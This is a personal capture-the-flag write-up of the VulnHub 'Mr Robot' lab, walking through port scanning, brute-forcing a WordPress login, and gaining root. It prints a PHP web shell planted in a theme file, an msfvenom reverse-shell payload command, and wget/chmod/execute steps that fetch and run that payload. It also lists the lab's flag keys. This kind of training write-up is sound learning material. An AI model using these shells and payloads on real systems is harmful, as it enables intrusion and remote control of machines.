Hello Friend.

This will be me trying to solve the Mr Robot challenge which is released from vulnhub. Here is the link. https://www.vulnhub.com/entry/mr-robot-1,151/
And now me trying to solve the challenge. I’m expecting several problems and mistakes, but I believe that it will help both of us. You, because you will see thinks from my perspective and be able to understand how I’m thinking and it may help me because I believe that some of you will have some suggestions to make. You can communicate with us via facebook or the contact form of this website.

In order of this to work, try to read every sentence in Eliot voice ๐Ÿ˜›

First touch of our target!
Who is our target? Mr Robot. What is our goal? to find 3 unique keys. What do we have to do first? find where our target is.We are going to be obvious on this step and open nmap to enumerate the computers on my network.

I will assume that I do not have physical access to the machine. This means that I will not try log in via the virtualbox.

Enumerating the system:

We need to find the computer ip address in order to make further investigation to the device. I am thinking of nmap right now but we are going to scan a range of ips in order to find the right one. Thinks can be a little tricky on host discovery, we must scan 65535 ports on every host. we have 254 possible hosts that equals to 65535*254 possible connections. The nmap will take an eternity to finish so we must find another way. The obvious way is to limit the ports. we do not have any information about the system which means that we must predict the port or count to our luck. I want to try something different. I will open wireshark and try to sniff every packet on my network for about 5 minutes. ย  Another solution could be masscan. Masscan is a script created for scanning multiple hosts in a small amount of time. Git for masscan: https://github.com/robertdavidgraham/masscan. Just for fun I am going to hit a scan with masscan just to see the calculated amount of time which is required to scan the whole network.

As you can see it was not the best idea ever :P.

Ok the 5 minutes have passed and the wireshark did not find the ip. Thats shame ๐Ÿ™
We are going with plan b. let’s scan for the first 100 ports hoping to get something. The thing that I would normally do is to put the most common ports there but whatever… To be honest I hope that port 80 will be open :D. Here is a list with the most common ports: http://www.webopedia.com/quick_ref/portnumbers.asp

Yes I changed my terminal profile… I reinstalled my ubuntu recently and this lab is my first on this machine… I have not even installed all of my tools yet ๐Ÿ˜›

As we can see on the above picture, nmap successfully found some hosts. by visiting 192.168.56.101 we can see that this is our target. Let’s see if we can find anything else on it.
I am going to make a complete scan for services in unusual post as well as os discovery. nmap -sT -A -p – 192.168.56.101

The scan has been completed and as we can see on the above picture. We do not have much of choices.. Let’s visit the site with our browser. (on both ports 443 and 80).
Both services lead to the following screen:

It may sound silly but the first thing that I did when the the above screen came up was to type the ip of the first line on my browser, I had not luck but it was worth the shot. I am going to play with the commands for some time.

Ok after I played some time with the commands I notice two interested things. First the prepare command have a picture with this site: whoismrrobot.com and the join command ask for an email address.

After visiting whoismrrobot.com and seeing the terminal the first think that I did was to check if the commands of the site were working on the terminal of my virtual environment but they were not.

Ok it is time to have a look on the source code of the page.
These lines gave us some basic info:

<link rel=’stylesheet’ id=’genericons-css’ย  href=’http://192.168.56.101/wp-content/themes/twentyfifteen/genericons/genericons.css?ver=3.2′ type=’text/css’ media=’all’ />
<link rel=’stylesheet’ id=’twentyfifteen-style-css’ย  href=’http://192.168.56.101/wp-content/themes/twentyfifteen/style.css?ver=4.3.1′ type=’text/css’ media=’all’ />

wp-content which basically screaming that it is a wordpress website. Yes I know that we could use a whatcms tool but why would we want fill the logs of the server? This was faster and easier.

Now I will go to the https://192.168.56.101/wp-admin/ and try some well-known credentials. None of them worked. Let’s scan the site with wpscan in order to find any possible vulnerabilities! The first idea was to enumerate the users of the site in order to make a quick bruteforce attempt but i failed miserable so shot for the plugins… We have some pretty results.

Easy info: https://wpvulndb.com/vulnerabilities/7857
Running the exploit:

I will have a look on the database of the website later.

This is what I wanted to see: https://wpvulndb.com/vulnerabilities/8714

By searching really quick on exploit-db I found this: https://www.exploit-db.com/exploits/40968/

The moment I found the exploit took a quick break of one hour and ate some chocolate… I was thinking about the challenge and I remind myself our goals. I was thinking where those keys would be hidden… the first idea was the http headers. I had not luck but the moment I sit back on my computer I saw the robots.txt file somewhere on my terminal and I decided to have a look. We found our first key (Yayy :D) http://192.168.56.101/robots.txt

 

Key: 073403c8a58a1f80d943455fb30724b9

what fsociey.dic would be? It is not a file or command… I will just keep it there for later use?

Now it is time to execute the exploit… Well it did not worked… That is unfortunate… Am I missing something?

I fired a scan with nikto… I did not found anything useful but the public files have information related to the tv show.
license.txt: “what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?”

After 1 hour of searching for exploits/testing the vulnerabilities and scanning I finally realized that I wrote wrong the fsociety.dic file when I was checking if it is a file on the server… I accidentally wrote: 192.168.56.101/fsociety.dat
fsociety.data ~ Do not delete this ๐Ÿ˜‰ (some of you got it :P)

In the end it was a file with a list of passwords… this means that we have to bruteforce the wp-admin obviously?
We have the passwords but what username should we use? We are going to try root first because when we visited the site it was the username that it was typed on the login screen.What other usernames could it be? I am thinking of the following list:

1.root
2.elliot
3.tyrell
4.mrrobot

Let’s start our first attempt ruby wpscan.rb –url 192.168.56.101 –wordlist ~/Downloads/fsocity.dic –username root

This will take some time… I am going to eat something (again) ๐Ÿ˜›

Finally. Username: elliot Password: ER28-0652

It took me freaking 8 hours…

Let’s look around on the panel… For some reason elliots psycologist krista Gordon have an account..

By observing Kristas gordon profile can we see another key?

That is an interesting username. Let’s continue to the Elliot’s profile.

 

By following the wiki link we can see that Elliot is Employee number ER28-0652

Ok it is time to upload our shell now… By modifying the 404.php page with the wordpress editor we can easily execute commands to the operating system. I added these lines after the <?php of 404.php page of wordpress:
echo “Begin of shell\n<br>”;
$out = array();
exec($_GET[‘c’], $out);
foreach($out as $line) {
echo $line.”<br>”;
}
echo “\n<br>End of shell”;

By visiting: https://192.168.56.101/wordpress/404.php?c=COMMAND I can execute my command and observe the output

After playing some time with commands to observe the system I accidentally found the second key. It is in the directory /home/robot

To be honest I do not want to wait another 5 hours to crack the above hashcode… I will just use one online md5 cracker (it is a public challenge… it is almost certain that it will be cracked instantly). The password is: abcdefghijklmnopqrstuvwxyz

We have a username and a password and we know from our first nmap scan that there is an ssh service on a closed port on the server… Let’s open the port and try to connect to the ssh.

This requires a sudo command so let’s try some simple tricks here. I am running the following command:

echo “abcdefghijklmnopqrstuvwxyz” | sudo ufw allow 22

Did not work… Should I go the traditional way and try to download and install meterpreter?

I generated my payload using the following command: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f elfย  -a x86 –platform linux -o /var/www/payload

I started my apache server in order to download the payload on the target machine

I found a folder with write permissions enabled and I executed the following command: https://192.168.56.101/wordpress/404.php?c=wget%20-o%20../tmp/payload2%20-P%20../tmp/test%20http://192.168.56.1/payload

I changed the permissions of the file in order to execute it by typing: https://192.168.56.101/wordpress/404.php?c=chmod 755 ../tmp/test/payload

Finally I executed the file by typing: https://192.168.56.101/wordpress/404.php?c=../tmp/test/payload

Now I have a meterpreter session opened on my metasploit.
Now we will try to become root… the getprivs failed so we need to think of something else.

Funny think… I tried to cat the key-2-of-3.txt file but I do not have the permissions to do it… I thought that it was empty and that we only had one password… This is interesting… we know where our next clue would be… we still have to login as user robot…

typing su robot and the password we gain robot privileges. We can see that it is another hash in the file:822c73956184f694993bede3eb39f959

Ok at this point I am not sure how I could gain root privileges… I will just enumerate the services which are running and I hope that I will think of something…

After 45 minutes:

I will be honest .. I got tired and I had a quick look on google and I found out that I do it with nmap… well I will try the obvious…

Now let’s search for the third key… And obviously I will look on the root directory for it ๐Ÿ˜‰

Yep.. here it is our third and last key:04787ddef27c3dee1ee161b21670b4e4

Conclusion:

It was not a very difficult lab but to be honest it was very fun… I am loving this show and the lab was very interesting…

I hope you guys liked the topic and had a great time… It took me more hours than I expected and I got very tired on the last challenge but well I cheat!ย  ๐Ÿ˜›
I would be happy to hear about any suggestions or ask for tips.

Thank you very much ๐Ÿ™‚